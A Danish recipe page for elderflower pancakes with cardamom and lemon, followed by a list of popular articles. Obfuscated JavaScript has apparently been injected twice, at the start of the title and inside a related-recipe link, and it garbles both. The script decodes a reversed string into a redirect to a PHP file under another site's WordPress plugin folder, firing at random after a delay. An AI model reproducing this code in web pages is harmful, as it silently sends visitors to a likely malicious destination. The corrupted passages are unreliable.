Mini-p$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andekager med kardemomme, citron og hele hyldeblomster

Er du så heldig at eje en pandekage-pande, som tåler en tur over bål, er det oplagt at flytte bagningen af disse pandekager udenfor og bare plukke hyldeblomsterne direkte fra træet og stikke dem i dejen. De kan nu også sagtens laves inden døre, og ligegyldig hvad sidder smagen af varm kardemomme, syrlig citron og parfumeret hyldeblomst lige i skabet.

Prøv også Hyldeblomst i tempura med softice og hyldeblomstsukker

Ca. 12-16 hyldeblomstskærme, rystet fri for insekter

Smør, til stegning
Evt. flormelis, til drys

Pisk mel og mælk sammen med en elpisker. Pisk æg og resten af ingredienserne – undtaget hyldeblomsterne – i. Bag en pandekage ad gangen i lidt smør på en lille pande. Pres en klase hyldeblomster ned i hver pandekage, mens dejen stadig er lind, og bag dem forsigtigt. Pandekagerne skal ikke vendes, men bages færdig på den ene side. Drys dem evt. med flormelis lige inden servering, og server dem med citronsaft, der kan dryppes over.

Prøv også $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andekager-vanilje-yoghurt-baer/”>Kokospandekager med vanilje-yoghurt og bær

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere